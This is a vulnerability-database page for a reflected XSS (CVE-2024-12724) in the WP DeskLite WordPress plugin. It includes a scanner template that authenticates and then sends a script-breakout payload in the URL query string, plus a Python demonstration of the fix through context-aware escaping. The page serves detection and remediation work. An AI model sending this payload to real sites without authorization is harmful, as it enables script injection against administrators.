WP DeskLite - Reflected XSS
CVE-2024-12724
Verified
Description
The WP DeskLite WordPress plugin through version 1.0.0 contains a reflected XSS caused by unsanitized and unescaped parameter output, letting attackers execute scripts in the browsers of high-privilege users such as admin; exploitation requires a crafted request.
Severity: Medium
CVSS Score: 6.1
Exploit Probability: 0%
Affected Product: wp_desklite
Published Date: February 6, 2026
Template Author: sourabh-sahu
CVE-2024-12724.yaml
id: CVE-2024-12724

info:
  name: WP DeskLite - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    WP DeskLite WordPress plugin through 1.0.0 contains a reflected XSS caused by unsanitized and unescaped parameter output, letting attackers execute scripts against high privilege users such as admin, exploit requires crafted request.
  impact: |
    Attackers can execute scripts in admin users' browsers, potentially leading to account takeover or unauthorized actions.
  remediation: |
    Update to the latest version with proper input sanitization and escaping.
  reference:
    - https://wpscan.com/vulnerability/9dd3ffaa-9020-47a6-bf9a-7e1412b9e9d5/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-12724
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-12724
    cwe-id: CWE-79
    epss-score: 0.00252
    epss-percentile: 0.48575
    cpe: cpe:2.3:a:codeflock:wp_desklite:1.0.0:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: codeflock
    product: wp_desklite
  tags: cve,cve2024,wordpress,wp,wp-plugin,xss,wp-desklite,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to={{RootURL}}/wp-admin/&testcookie=1

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/edit.php?post_type=wpdl_ticket&"></script><script>alert(1)</script><script>=` HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(1)</script><script>","wp-desklite")
        condition: and
# digest: 4a0a00473045022076550293bd04b93b0438088f04c9f9f233f58a2916c945b06d531e5ba4e4ac9e02210094302354188b8cb7faccf1de76d163ee4d96132201dfce602337a080a609d821:922c64590222798bb761d5b6d8e72950
Score: 6.1
CVSS Metrics
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID: CVE-2024-12724
CWE ID: CWE-79
Remediation Steps
Update to the latest version with proper input sanitization and escaping.
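As an added example (not part of the template above and not the plugin's code), the following Python mirrors the template's second matcher against a hypothetical admin page that reflects the request URI into a JavaScript string, first unescaped and then with context-aware escaping as the remediation calls for. The sink context, the `wpdlCurrentUrl` variable and the HTML fragment are assumptions constructed for the demonstration; only the payload and matcher strings come from the template.

```python
import json

# Strings taken from the template on this page: the injected query-string key
# and the substring the second matcher looks for in the response body.
PAYLOAD_KEY = '"></script><script>alert(1)</script><script>='
MARKER = '></script><script>alert(1)</script><script>'
REQUEST_URI = '/wp-admin/edit.php?post_type=wpdl_ticket&' + PAYLOAD_KEY


def render_unescaped(request_uri: str) -> str:
    """Hypothetical vulnerable sink (constructed fragment): the raw request
    URI is dropped into a JavaScript string literal with no escaping."""
    return ('<div class="wp-desklite"><script>'
            'var wpdlCurrentUrl = "' + request_uri + '";'
            '</script></div>')


def js_string_literal(value: str) -> str:
    """Encode value as a JavaScript string literal that cannot terminate the
    enclosing <script> element or open a new tag."""
    literal = json.dumps(value)  # escapes quotes, backslashes, control chars
    # json.dumps leaves '<', '>' and '&' untouched, so a "</script>" inside the
    # value would still end the script element; emit them as \u escapes.
    return (literal.replace('<', '\\u003c')
                   .replace('>', '\\u003e')
                   .replace('&', '\\u0026'))


def render_escaped(request_uri: str) -> str:
    """Same hypothetical sink, with the value written via js_string_literal()."""
    return ('<div class="wp-desklite"><script>'
            'var wpdlCurrentUrl = ' + js_string_literal(request_uri) + ';'
            '</script></div>')


def template_matches(status_code: int, body: str) -> bool:
    """Mirror of the template's second matcher:
    status_code == 200 and contains_all(body, MARKER, "wp-desklite")."""
    return status_code == 200 and MARKER in body and 'wp-desklite' in body


def script_breakout(body: str) -> bool:
    """True if the reflected value closed the page's single <script> early,
    i.e. more </script> tags appear than the page itself emits."""
    return body.count('</script>') > 1


if __name__ == '__main__':
    for label, render in (('unescaped', render_unescaped), ('escaped', render_escaped)):
        body = render(REQUEST_URI)
        print(f'{label}: matcher={template_matches(200, body)} '
              f'breakout={script_breakout(body)}')
```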